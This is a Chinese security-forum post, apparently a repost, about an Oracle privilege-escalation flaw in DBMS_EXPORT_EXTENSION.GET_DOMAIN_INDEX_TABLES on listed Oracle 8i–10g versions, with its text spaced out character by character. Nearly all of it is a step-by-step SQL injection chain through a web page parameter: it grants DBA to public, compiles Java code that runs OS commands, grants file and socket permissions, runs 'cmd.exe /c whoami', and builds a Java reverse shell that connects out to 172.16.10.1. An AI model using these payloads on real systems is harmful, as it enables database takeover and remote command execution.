搜索

[20845] 2017-08-08_Oracle提权漏洞

文档创建者:s7ckTeam
浏览次数:17
最后更新:2025-01-18
2017-08-08_Oracle提权漏洞 O r a c l e   L e m o n S e c   2 0 1 7 - 0 8 - 0 8 G E T _ D O M A I N _ I N D E X _ T A B L E S : O r a c l e   8 . 1 . 7 . 4 ,   9 . 2 . 0 . 1   -   9 . 2 . 0 . 7 ,   1 0 . 1 . 0 . 2   -   1 0 . 1 . 0 . 4 ,   1 0 . 2 . 0 . 1 - 1 0 . 2 . 0 . 2 s y s s q l p u b l i c o r a c l e h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S   _ O U T P U T " . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A A U T O N O M O U S _ T R A N S A C T ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' g r a n t   d b a   t o   p u b l i c ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 ) )   i s   n o t   n u l l - - O r a c l e J A V A J A V A J A V A   J A V A h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   s y s . c m d ( ' c m d . e x e   / c   w h o a m i ' )   f r o m   d u a l )   i s   n o t   n u l l - - S H E L L J A V A s h e l l 便 J A V A S H E L L h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T "   . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' c r e a t e   o r   r e p l a c e   a n d   c o m p i l e   j a v a   s o u r c e   n a m e d   " C o m m a n d "   a s   i m p o r t   j a v a . i o . * ; p u b l i c   c l a s s   C o m m a n d { p u b l i c   s t a t i c   S t r i n g   e x e c ( S t r i n g   c m d )   t h r o w s   E x c e p t i o n { S t r i n g   s b = " " ; B u f f e r e d I n p u t S t r e a m   i n   =   n e w   B u f f e r e d I n p u t S t r e a m ( R u n t i m e . g e t R u n t i m e ( ) . e x e c ( c m d ) . g e t I n p u t S t r e a m ( ) ) ; B u f f e r e d R e a d e r   i n B r   =   n e w   B u f f e r e d R e a d e r ( n e w   I n p u t S t r e a m R e a d e r ( i n ) ) ; S t r i n g   l i n e S t r ; w h i l e   ( ( l i n e S t r   =   i n B r . r e a d L i n e ( ) )   ! =   n u l l ) s b + = l i n e S t r + " " ; i n B r . c l o s e ( ) ; i n . c l o s e ( ) ; r e t u r n s b ; } } ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T " . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' b e g i n   d b m s _ j a v a . g r a n t _ p e r m i s s i o n (   ' ' ' ' ' ' ' ' P U B L I C ' ' ' ' ' ' ' ' ,   ' ' ' ' ' ' ' ' S Y S : j a v a . i o . F i l e P e r m i s s i o n ' ' ' ' ' ' ' ' ,   ' ' ' ' ' ' ' ' < < A L L   F I L E S > > ' ' ' ' ' ' ' ' ,   ' ' ' ' ' ' ' ' e x e c u t e ' ' ' ' ' ' ' '   ) ; e n d ; ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l - - h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T "   . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' c r e a t e   o r   r e p l a c e   f u n c t i o n   c m d ( p _ c m d   i n   v a r c h a r 2 )   r e t u r n   v a r c h a r 2   a s   l a n g u a g e   j a v a   n a m e   ' ' ' ' ' ' ' ' C o m m a n d . e x e c ( j a v a . l a n g . S t r i n g )   r e t u r n   S t r i n g ' ' ' ' ' ' ' ' ;   ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l - - h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T "   . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' g r a n t   a l l   o n   c m d   t o   p u b l i c ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l - - h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T " . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' c r e a t e   o r   r e p l a c e   a n d   c o m p i l e   j a v a   s o u r c e   n a m e d   " s h e l l "   a s   i m p o r t   j a v a . i o . * ; i m p o r t   j a v a . n e t . * ; p u b l i c   c l a s s   s h e l l { p u b l i c   s t a t i c   v o i d   r u n ( )   t h r o w s   E x c e p t i o n   { S o c k e t   s   =   n e w   S o c k e t ( " 1 7 2 . 1 6 . 1 0 . 1 " ,   8 0 ) ; P r o c e s s   p   =   R u n t i m e . g e t R u n t i m e ( ) . e x e c ( " c m d . e x e " ) ; n e w   T ( p . g e t I n p u t S t r e a m ( ) ,   s . g e t O u t p u t S t r e a m ( ) ) . s t a r t ( ) ; n e w   T ( p . g e t E r r o r S t r e a m ( ) ,   s . g e t O u t p u t S t r e a m ( ) ) . s t a r t ( ) ; n e w   T ( s . g e t I n p u t S t r e a m ( ) ,   p . g e t O u t p u t S t r e a m ( ) ) . s t a r t ( ) ; } s t a t i c   c l a s s   T   e x t e n d s   T h r e a d   { p r i v a t e   I n p u t S t r e a m   i ; p r i v a t e   O u t p u t S t r e a m   u ; p u b l i c   T ( I n p u t S t r e a m   i n ,   O u t p u t S t r e a m   o u t )   { t h i s . u   =   o u t ; t h i s . i   =   i n ; } p u b l i c   v o i d   r u n ( )   { B u f f e r e d R e a d e r   n   =   n e w   B u f f e r e d R e a d e r ( n e w   I n p u t S t r e a m R e a d e r ( i ) ) ; B u f f e r e d W r i t e r   w   =   n e w   B u f f e r e d W r i t e r ( n e w   O u t p u t S t r e a m W r i t e r ( u ) ) ; c h a r   f [ ]   =   n e w   c h a r [ 8 1 9 2 ] ; i n t   l ; t r y   { w h i l e   ( ( l   =   n . r e a d ( f ,   0 ,   f . l e n g t h ) )   >   0 )   { w . w r i t e ( f ,   0 ,   l ) ; w . f l u s h ( ) ; } }   c a t c h   ( I O E x c e p t i o n   e )   { } t r y   { i f   ( n   ! =   n u l l ) n . c l o s e ( ) ; i f   ( w   ! =   n u l l ) w . c l o s e ( ) ; }   c a t c h   ( E x c e p t i o n   e )   { } } } } ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l - - h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T " . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' b e g i n   d b m s _ j a v a . g r a n t _ p e r m i s s i o n (   ' ' ' ' ' ' ' ' P U B L I C ' ' ' ' ' ' ' ' ,   ' ' ' ' ' ' ' ' S Y S : j a v a . n e t . S o c k e t P e r m i s s i o n ' ' ' ' ' ' ' ' ,   ' ' ' ' ' ' ' ' < > ' ' ' ' ' ' ' ' ,   ' ' ' ' ' ' ' ' * ' ' ' ' ' ' ' '   ) ; e n d ; ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l - - h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T "   . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' c r e a t e   o r   r e p l a c e   f u n c t i o n   r e v e r s e t c p   R E T U R N   V A R C H A R 2   a s   l a n g u a g e   j a v a   n a m e   ' ' ' ' ' ' ' ' s h e l l . r u n ( )   r e t u r n   S t r i n g ' ' ' ' ' ' ' ' ;   ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l - - h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T _ D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T "   . P U T ( : P 1 ) ; E X E C U T E   I M M E D I A T E   ' ' D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' ' ' ' g r a n t   a l l   o n   r e v e r s e t c p   t o   p u b l i c ' ' ' ' ; E N D ; ' ' ; E N D ; - - ' , ' S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l )   i s   n o t   n u l l - -
h t t p : / / w w w . i s w i n . o r g / o r a c l e . j s p ? n a m e = '   a n d   ( s e l e c t   s y s . r e v e r s e t c p   f r o m   d u a l )   i s   n o t   n u l l - -
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理